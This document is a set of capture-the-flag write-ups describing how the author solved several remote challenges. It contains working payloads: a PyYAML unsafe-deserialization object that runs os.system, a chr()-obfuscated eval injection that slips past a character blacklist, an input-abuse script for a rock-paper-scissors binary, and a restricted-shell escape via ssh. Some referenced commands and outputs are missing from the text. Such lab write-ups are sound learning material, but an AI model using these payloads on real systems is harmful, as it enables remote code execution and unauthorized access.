This challenge will use python YML deserialization.

When connecting to the remote we can generate a config load a config or exit

When we generate a config we get a base64 string

When decoded:

First I noted that this is a python service running on the remote.

After looking for a similar structured string online I found out that this is what YML serialization looked like

Next I had looked at how this can be exploited.

It seems that there are 2 types of load functions:

* `safe_load` - will not deserialize class objects

* `load` - will deserialize class objects

I tried my luck with hoping that it will use unsafe deseralization, and it was

import yaml

import base64

from yaml import UnsafeLoader, FullLoader, Loader

import subprocess

import os

class Payload(object):

def __reduce__(self):

return (os.system,('cat flag.txt',))

deserialized_data = yaml.dump(Payload()) # serializing data

print(base64.b64encode(deserialized_data))

Before the final version I have submitted some other commands to find out where the flag is on the system.

For this challenge we get a binary that will be running on the remote.

First I check the rules of the game, and it seems like a rock, paper, scissors game.

When playing we can type rock, paper, scissors, the opponent will guess as well and we need to win 100 times.

Let's see how the game is implemented in ghidra

for (; rounds < 100; rounds = rounds + 1) {

fprintf(stdout,"\n[*] Round [%d]:\n",rounds);

game();

}

First our input is read, and the opponent chooses a random move.

`local_78` is the array of moves for the opponent.

At matching indices `local_58` contains the winning moves that we need to make, important to note how a draw counts as a lose for some reason.

But look at what function is used! `strstr` looks for the second argument in the first argument, and returns the index of the first occurrence or NULL if not found.

Now notice how when reading user input 0x1f bytes are read.

We can just send `rockpaperscissors` on each choice and it would surely contain the winning move!

from pwn import *

p = remote('165.227.224.40', 30509)

payload = 'rockpaperscissors'

p.sendlineafter(b'>>', b'1')

for i in range(99):

p.sendlineafter(b'>>', b'rockpaperscissors')

print(f'sent {i}')

p.interactive()

For some reason there was an issue with sending this 100 times, so I decreased the count to 99

After this the opponent gives us the flag.

For this challenge the remote allows us to send input.

After some trial and error I sent

`print(1)` and I got back 1 as the result. This seems like python evaluates whatever we input

Let's try `print('test')`!

Oh, this contains a blacklisted character :(

But parentheses work! We can construct any string we want by doing `chr(<ascii code>)+...+chr(<ascii code>)`

And luckily the `+` is also allowed.

Now all that is left to do is to encode our payload with the following method to get the flag:

def obf(inp):

ans = []

for c in inp:

ans.append(f'chr({ord(c)})')

return '+'.join(ans)

shell_cmd = 'cat flag.txt'

eval_content = f'__import__("os").system("{shell_cmd}")'

command = f'print(eval({obf(eval_content)}))'

print(command)

This challenge asks us to send around 1000 request to a `/flag` endpoint.

import requests

for i in range(0, 2000):

resp = requests.get('http://165.232.108.36:30519/flag')

if b'HTB' in resp.content: print(resp.content)

In this challenge we will need to perform some computation coming from a remote

First let's read through the **help** menu

So now we know something about rounding and the types of errors we should have.

I will shamelessly pass all the input to `eval` in python.

It would have been funny if they sent an RCE :)

The errors are pretty much already covered by python and the calculation logic is obviously implemented.

from pwn import *

p = remote('165.227.224.40', 30418)

p.sendlineafter(b'>', b'1')

for i in range(0, 500):

req = p.recvuntil(b'=')

eq = req.split(b': ')[1][:-2]

print(eq)

ans = None

try:

ans = round(eval(eq), 2)

if ans < -1337.00 or ans > 1337.00: ans = 'MEM_ERR'

else: ans = str(ans)

except ZeroDivisionError:

ans = 'DIV0_ERR'

except SyntaxError:

ans = 'SYNTAX_ERR'

print(f' -- {ans}')

p.sendlineafter(b'>', bytes(ans, 'utf-8'))

p.interactive()

In this challenge we will try to bypass a restricted bash shell

From the `Dockerfile` we see that a restricted environment is set up.

* Our user will be the **restricted** user

* As shell we will have `rbash`

* We will have access to 3 executables: `top`, `uptime` and `ssh`

* Our path is restricted to the `.bin` folder in our home directory

Reading the ssh configuration I found the following line:

Okay so we can log in using the **restricted** user through ssh.

Once on the system it seems that we can't do anything.

This is a good time to go to [GTFO bins](https://gtfobins.github.io/) to see if there is any way to escape our restricted environment.

`top` and `uptime` don't seem helpful, however `ssh` seems promising.

I went to the file read section, which suggested a way to read files outside of the restricted environment.

From the docker file we already know the flag is in `/flag<random>`, so we use the following command on the remote:

This will read us the flag :)

First I get the instructions of the game

Basically:

* cross a bridge

* only one flashlight is available which is limited

* flashlight is required to cross

* at most 2 people can cross

* each person has a different time to cross

* the crossing speed is that of the slowest person on the bridge

First I have thought that a greedy solution would be good for this challenge.

This would mean that I find the fastest person and then always send from one side the fastest person and someone, and then only the fastest person on the way back.

After trying and failing a couple of times I started to question whether this was truly the best approach.

I had a slight intuition that we could send the 2 slowest people across, because that would essentially delete the time penalty of the second slowest person, whereas with my approach we always take the time penalty of every person.

The basic 4 person version of this problem is quite popular as internet browsing suggests.

1. Send 2 fastest

2. Send fastest back

3. Send 2 slowest

4. Send 2nd fastest back

5. Make 2 fastest cross together

6. win

However extending this to multiple people, or having an algorithm to give the ordering of people and not just the shortest time was not so popular anymore.

Still I have tried going with this approach and hard coding sending some fastest and slowest pairs.

In the end my algorithm doesn't always produce the perfect solution, however for some instance of the problem it does, and that resulted in the flag.

ppl = {

1: 66,

2: 43,

3: 33,

4: 1,

5: 62,

6: 17,

7: 68,

8: 40,

}

battery = 232

ppl_sorted = {k: v for k, v in sorted(ppl.items(), key=lambda item: item[1])}

print(ppl_sorted)

ppl_sorted = list(ppl_sorted.items())

ans = []

ans.append(f'[{ppl_sorted[0][0]},{ppl_sorted[1][0]}]')

ans.append(f'[{ppl_sorted[0][0]}]')

ans.append(f'[{ppl_sorted[-1][0]},{ppl_sorted[-2][0]}]')

ans.append(f'[{ppl_sorted[1][0]}]')

ans.append(f'[{ppl_sorted[0][0]},{ppl_sorted[1][0]}]')

ans.append(f'[{ppl_sorted[0][0]}]')

ans.append(f'[{ppl_sorted[-3][0]},{ppl_sorted[-4][0]}]')

ans.append(f'[{ppl_sorted[1][0]}]')

cost = (ppl_sorted[1][1] * 2 + ppl_sorted[0][1]) * 2 + ppl_sorted[-1][1] + ppl_sorted[-3][1]

for i in range(1, len(ppl)-4):

ans.append(f'[{ppl_sorted[0][0]},{ppl_sorted[i][0]}]')

cost += ppl_sorted[i][1]

if i != len(ppl) - 5:

ans.append(f'[{ppl_sorted[0][0]}]')

cost += ppl_sorted[0][1]

print(','.join(ans))

print(cost)

I print the `cost` which is the time spent so that I can immediately see if a solution will be accepted by the remote. I never made a script that does this automatically instead I just copied the input values by hand.